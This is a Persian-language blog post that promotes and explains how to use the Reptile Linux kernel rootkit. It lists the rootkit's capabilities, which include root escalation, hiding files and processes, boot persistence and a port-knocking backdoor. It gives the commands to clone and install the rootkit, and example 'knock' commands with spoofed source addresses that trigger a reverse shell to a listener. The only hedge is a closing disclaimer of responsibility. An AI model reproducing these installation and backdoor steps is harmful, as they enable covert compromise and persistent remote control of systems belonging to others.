معرفی Rootkit لینوکسی Reptile

Rootkit چیست ؟

معرفی Rootkit لینوکسی Reptile !!! روت کیت چیست ؟
امروز قصد معرفی یک Rootkit لینوکسی پیشرفته رو برای شما عزیزان دارم !!!
این Rootkit برای اهداف شیطانی و سو استفاده نوشته شده است و روی کرنل های : 2.6x – 3.x – 4.x
پاسخگو است ، و تقریبا میشه گفت جز بهترین روت کیت های پابلیک شده موجود در سطح نت میباشد.
معرفی Rootkit لینوکسی Reptile

Rootkit چیست ؟

با سلام و احترام خدمت تمامی دوستان و اعضای محترم تیم امنیتی PentestCore.Com
در ابتدا بررسی کنیم Rootkit چیست ؟
همانطور که از اسمش پیداست ، نوعی بدافزار است که
با ورود به سیستم تارگت به بالاترین سطح دسترسی یعنی روت ارتقا پیدا میکند
و توانایی تغییر تمامی تنظیمات را داراست ، اغلب صاحب سیستم متوجه حضور آن نمیشود و یافتن آن بسیار سخت و تقریبا غیر ممکن است.

روت کیت لینوکسی Reptile دارای ویژگی های زیر است :

  • Give root to unprivileged users
  • Hide files and directories
  • Hide files contents
  • Hide processes
  • Hide himself
  • Hidden boot persistence
  • Heaven’s door – A ICMP/UDP/TCP port-knocking backdoor
  • Client to knock on heaven’s door 😀

نحوه نصب Rootkit :

  • 1-apt-get install linux-headers-$(uname -r)
    2-git clone https://github.com/f0rb1dd3n/Reptile.git
    3-cd Reptile
  • 4- install installer.sh/.

اطلاعات بصورت باینری داخل پوشه /reptile کپی میشوند که توسط روت کیت این پوشه مخفی شده است .
بدست آوردن اختیارات روت…
معرفی Rootkit لینوکسی Reptile
نحوه استفاده کردن از قابلیت Hide :
معرفی Rootkit لینوکسی Reptile

نحوه استفاده از قابلیت Knocking on heaven’s door :

switch (-x)  Protocol (ICMP/UDP/TCP)
switch (-s)  Source IP address (You can spoof)
switch (-t)  Target IP address
switch (-p)  Source Port
switch (-q)  Target Port
switch (-d)  Data to knock on backdoor: “<key> <reverse IP> <reverse Port>” -l Launch listener
switch (-l)  Launch listener

مثال :

ICMP: ./knock -x icmp -s 192.168.0.2 -t 192.168.0.3 -d “F0rb1dd3n 192.168.0.4 4444” -l

UDP: ./knock -x udp -s 192.168.0.2 -t 192.168.0.3 -p 666 -q 53 -d “F0rb1dd3n 192.168.0.4 4444” -l

TCP: ./knock -x tcp -s 192.168.0.2 -t 192.168.0.3 -p 666 -q 80 -d “F0rb1dd3n 192.168.0.4 4444” -l

معرفی Rootkit لینوکسی Reptile

لینک گیت هاب ابزار :


Reptile Rootkit

  krack حملاتی برای نفوذ به الگوریتم wpa2

امیدوارم که مفید بوده باشه
مسولیت استفاده نادرست به عهده کاربر میباشد…

0/5 (0 نظر)

مطالب مرتبط

اسکن سریع اسیب پذیری

اسکن سریع اسیب پذیری با CRLFuzz

در این آموزش با نحوه اسکن سریع اسیب پذیری ها با استفاده از ابزار CRLFuzz آشنا خواهید شد، با ما در ادامه این آموزش هک و امنیت همراه باشید. 0/5 (0 نظر)   اموزش تست نفوذ و جلوگیری از هک وایرلس

تشخیص دامنه های جعلی

تشخیص سایت ها و دامنه های جعلی

آموزش به نحوه تشخیص سایت‌ها و دامنه های جعلی با استفاده از ابزار EvilURL می پردازیم، با ما در ادامه این آموزش همراه باشید. 0/5 (0 نظر)   اموزش تصویری ابزار CyberScan به زبان فارسی

۲ دیدگاه در “معرفی Rootkit لینوکسی Reptile”

  • saman فروردین ۱۸, ۱۳۹۹ پاسخ

    سلام ببخشید در اونجا من به جای uname یوزر رو مینویسم نمیشه باید چی بنویسم ؟؟

    • نیما حسینی فروردین ۲۲, ۱۳۹۹ پاسخ

      درود
      نیازی نیست ، دستورات نصب اپدیت شده است، طبق دستورات جدید نصب را انجام دهید.

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *